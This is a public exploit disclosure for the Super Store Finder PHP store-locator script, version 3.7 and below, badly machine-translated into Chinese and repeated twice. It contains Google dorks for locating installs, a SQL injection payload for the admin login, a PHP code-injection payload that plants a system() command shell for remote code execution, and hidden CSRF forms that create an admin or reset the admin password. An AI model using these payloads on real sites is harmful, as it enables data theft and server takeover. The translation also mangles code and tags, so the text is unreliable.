@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.剥削标题超级明星- 多个漏洞
. Google Dorks .
“由乔马云惹不起马云伊兹(Joe Iz)设计和建造。”
“超级商店Finder是由Highwarden Huntsman的Joe Iz设计和建造的。”
inurl:/superstorefinder/index.php
. date: 0cterch,2023年10月13日
.利用作者: BRPSD
. contact: cy [at] live.no
.供应商-https://ww.superstorefinder.net/
.产品-https://codecanyon.net/item/super-store-finder/3630922
.产品版本- [3.7及以下]
. DBMS -mysql
.在MacOS [*Nix darwin kernel]上测试,在本地Xampp上测试
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#####################
|描述|
#####################
'Super Store Finder是一种多语言的PHP/JavaScript/MySQL商店定位器脚本,该脚本与最新的Google Maps API集成,可让客户轻松地找到您的商店。包装出了很棒的功能,例如地理位置,拖放标记,批量导入和地理代码,Google Street View,Google Maps Direction,它是可自定义且可进行的(使用SnazzyMaps.com具有可扩展的主题/附加组件,自定义颜色和地图设计)。商店查找器将能够列出您的网络访问者附近的商店/插座,从最近的距离之遥。您的客户将永远不会再迷失到您的商店/地点'
脆弱性1:未经验证的SQL注入
types:基于布尔的盲人,基于错误,基于时间的盲人
file: localhost/admin/index.php
VUL参数:用户名[POST]
=============================================================================================================
脆弱性1:未经验证的SQL注入
types:基于布尔的盲人,基于错误,基于时间的盲人
file: localhost/admin/index.php
VUL参数:用户名[POST]
测试#1
用户名=a'password=1btn_login=登录
响应错误:
大批
((
[0]=无效的查询:您在SQL语法中有错误;查看与您的MySQL Server版本相对应的手册,以获取正确的语法
)
选择用户。
=============================================================================================================
测试#2=有效载荷(概念证明)
用户名=a'and gtid_subset(concat(0x7162766b71,select(select(case(case when)(isnull(json_storage_free(null))),然后1 else 0 end),0x717070707071,3239),3239) -
密码=1BTN_LOGIN=登录
响应错误:
大批
((
[0]=无效的query:功能AdminStoreFinder.json_storage_free不存在
)
=============================================================================================================
==========================================================================================================================================================================================================================================
脆弱性2:身份验证的PHP注入- 远程代码执行
file: localhost/admin/settings.php
VUL参数:语言_SET [post]
概念证明:
langset=en_USlanguage_set=en_US');isset($GET['cmd'])?system($_GET['cmd']);//distance_set=miinit_zoom=0zoomhere_zoom=0geo_settings=0default_location=New York, USSTYLE_MAP_COLOR=RGBA(0,0,0,1)style_map_code=94102Style_top_bar_bg=rgba=rgba(0,0,0,0,1)style_top_bar_fo nt=rgba(0,0,0,0)style_top_bar_border=rgba(0,0,0,0,1)style_results_bg=rgba=rgba(0,0,0,0,0)style_results_hl BG=RGBA(0,0,0,1)style_results_hl_bg=rgba(0,0,0,0,1)style_results_hover_bg=rgba(0,0,0,0,1)style_result s_font=rgba(0,0,0,1)style_results_font=rgba(0,0,0,0)style_results_font=rgba(0,0,0,0,0)style_results_ results_distance_font=rgba(0,0,0,1)style_distance_toggle_bg=rgba(0,0,0,0,1)style_contact_button_bg=rgba=rgba(0,0,0,0,1)style_contact_buttact_button_button_font=rgba(0 ,0,0,1)style_button_bg=rgba(0,0,0,0)style_button_font=rgba(0,0,0,0,1)style_list_number_bg=rgba=rgba(0,0,0,0,0,1)
config.inc.php中包含的index.php,我们只能去rce
使用获取参数?cmd=
http://localhost:9000/?cmd=uname -a
Reponse:
22.2.0 Darwin内核版本22.2.0:星期五Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2〜4/realease_x86_64 x86_64
=============================================================================================================
=============================================================================================================
脆弱性3:跨场地请求伪造
风险:可以通过添加管理员或更改管理员密码来导致特权升级。
受影响的文件(1): localhost/superstorefinder/admin/users_add.php
参数:用户名,密码,cpassword
概念证明:
iframe style='display:none'name='csrf'/iframe
表单方法='post'action='http://localhost:9000/superstorefinder/admin/usder/user_add.php'target='csrf'id='csrf'
输入名称='submit_hidded'value='submit_hidded'type='隐藏' /
输入类型='隐藏'名称='用户名'value='x'
输入类型='隐藏'名称='密码'值='123'
输入类型='隐藏'名称='cpassword'value='123'
输入类型='隐藏'值='提交'
/形式
scriptDocument.getElementById('csrf')。submit()/脚本
iframe src='http://localhost:9000/superstorefinder/admin/logout.php'width='0'height='0'/iframe
受影响的文件(2:): localhost/superstorefinder/admin/change_password.php
参数:密码,cpassword,保存
概念证明:
iframe style='display:none'name='csrf'/iframe
表单方法='post'action='http://localhost:9000/superstorefinder/admin/usder/user_add.php'target='csrf'id='csrf'
输入类型='隐藏'名称='密码'值='123'
输入类型='隐藏'名称='cpassword'value='123'
输入类型='隐藏'名='save='value='save'
/形式
scriptDocument.getElementById('csrf')。submit()/脚本
iframe src='http://localhost:9000/superstorefinder/admin/logout.php'width='0'height='0'/iframe
==================================================================================================================
.剥削标题超级明星- 多个漏洞
. Google Dorks .
“由乔马云惹不起马云伊兹(Joe Iz)设计和建造。”
“超级商店Finder是由Highwarden Huntsman的Joe Iz设计和建造的。”
inurl:/superstorefinder/index.php
. date: 0cterch,2023年10月13日
.利用作者: BRPSD
. contact: cy [at] live.no
.供应商-https://ww.superstorefinder.net/
.产品-https://codecanyon.net/item/super-store-finder/3630922
.产品版本- [3.7及以下]
. DBMS -mysql
.在MacOS [*Nix darwin kernel]上测试,在本地Xampp上测试
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#####################
|描述|
#####################
'Super Store Finder是一种多语言的PHP/JavaScript/MySQL商店定位器脚本,该脚本与最新的Google Maps API集成,可让客户轻松地找到您的商店。包装出了很棒的功能,例如地理位置,拖放标记,批量导入和地理代码,Google Street View,Google Maps Direction,它是可自定义且可进行的(使用SnazzyMaps.com具有可扩展的主题/附加组件,自定义颜色和地图设计)。商店查找器将能够列出您的网络访问者附近的商店/插座,从最近的距离之遥。您的客户将永远不会再迷失到您的商店/地点'
脆弱性1:未经验证的SQL注入
types:基于布尔的盲人,基于错误,基于时间的盲人
file: localhost/admin/index.php
VUL参数:用户名[POST]
=============================================================================================================
脆弱性1:未经验证的SQL注入
types:基于布尔的盲人,基于错误,基于时间的盲人
file: localhost/admin/index.php
VUL参数:用户名[POST]
测试#1
正在加载...
localhost
响应错误:
大批
((
[0]=无效的查询:您在SQL语法中有错误;查看与您的MySQL Server版本相对应的手册,以获取正确的语法
)
选择用户。
=============================================================================================================
测试#2=有效载荷(概念证明)
正在加载...
localhost
密码=1BTN_LOGIN=登录
响应错误:
大批
((
[0]=无效的query:功能AdminStoreFinder.json_storage_free不存在
)
=============================================================================================================
==========================================================================================================================================================================================================================================
脆弱性2:身份验证的PHP注入- 远程代码执行
file: localhost/admin/settings.php
VUL参数:语言_SET [post]
概念证明:
正在加载...
localhost
config.inc.php中包含的index.php,我们只能去rce
使用获取参数?cmd=
http://localhost:9000/?cmd=uname -a
Reponse:
22.2.0 Darwin内核版本22.2.0:星期五Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2〜4/realease_x86_64 x86_64
=============================================================================================================
=============================================================================================================
脆弱性3:跨场地请求伪造
风险:可以通过添加管理员或更改管理员密码来导致特权升级。
受影响的文件(1): localhost/superstorefinder/admin/users_add.php
参数:用户名,密码,cpassword
概念证明:
iframe style='display:none'name='csrf'/iframe
表单方法='post'action='http://localhost:9000/superstorefinder/admin/usder/user_add.php'target='csrf'id='csrf'
输入名称='submit_hidded'value='submit_hidded'type='隐藏' /
输入类型='隐藏'名称='用户名'value='x'
输入类型='隐藏'名称='密码'值='123'
输入类型='隐藏'名称='cpassword'value='123'
输入类型='隐藏'值='提交'
/形式
scriptDocument.getElementById('csrf')。submit()/脚本
iframe src='http://localhost:9000/superstorefinder/admin/logout.php'width='0'height='0'/iframe
受影响的文件(2:): localhost/superstorefinder/admin/change_password.php
参数:密码,cpassword,保存
概念证明:
iframe style='display:none'name='csrf'/iframe
表单方法='post'action='http://localhost:9000/superstorefinder/admin/usder/user_add.php'target='csrf'id='csrf'
输入类型='隐藏'名称='密码'值='123'
输入类型='隐藏'名称='cpassword'value='123'
输入类型='隐藏'名='save='value='save'
/形式
scriptDocument.getElementById('csrf')。submit()/脚本
iframe src='http://localhost:9000/superstorefinder/admin/logout.php'width='0'height='0'/iframe
==================================================================================================================